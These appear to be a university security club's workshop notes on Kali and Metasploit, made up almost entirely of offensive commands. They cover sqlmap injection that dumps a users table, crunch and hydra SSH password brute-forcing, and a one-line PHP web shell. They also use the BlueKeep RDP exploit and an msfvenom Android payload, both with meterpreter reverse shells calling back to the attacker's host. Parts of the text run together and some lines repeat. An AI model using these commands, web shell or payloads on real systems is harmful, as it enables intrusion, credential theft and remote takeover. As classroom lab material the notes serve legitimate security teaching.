NISRA 2019.12.03
By Halloworld
在 Z:\NISRA\20191202_kali_metasploit底下
Warning
!!!請不要拿學校網路來nmap,否則你會被Ban!!!
$ dnsmap <url> -w /usr/share/wordlists/dnsmap.txt
beef.nisra.net:8000
註冊帳號,請開始你的表演
1. nmap 找開啟的服務
2. 如何登入 (回憶 SQLi)
//查看有哪些DB
sqlmap -u "http://<ip>/cat.php?id=1" --dbs --batch
//查看photoblog裡有甚麼表
sqlmap -u "http://<ip>/cat.php?id=1" -D photoblog --tables --batch //User? 有帳號密碼資訊????
sqlmap -u "http://<ip>/cat.php?id=1" -D photoblog -T users --batch --dump
!!請小心你的硬碟會被撐爆!!
$ crunch <length_start> <length_end> <key_word> -o <file>
ex: crunch 5 8 nisra -o pw.txt
ex: crunch 7 7 -t nisra%% -o pw.txt
% 代表數字
@ 代表小寫英文字母
hydra -l <user> -P <password_file> <ip> -t <task> ssh如何拿shell??
<pre>
<?php echo shell_exec($_GET['cmd']);?>
</pre>index.Php
f
安全漏洞的檢測工具
安全漏洞的檢測工具
website: https://www.metasploit.com/
cve_2019_0708_bluekeep_rce.rb
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //選擇exploit
show options //查看設定參數
set rhosts <target_ip> //設定被害者的ip
set GROOMSIZE 50
set payload windows/x64/meterpreter/reverse_tcp //設定攻擊payload
set lhost <your_ip>
set target 2// windows7 SP1 VBOX
run //攻擊腳本執行msfvenom –p android/meterpreter/reverse_tcp
LHOST=<your_ip> LPORT=<port> > <file>use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <your_ip>
exploit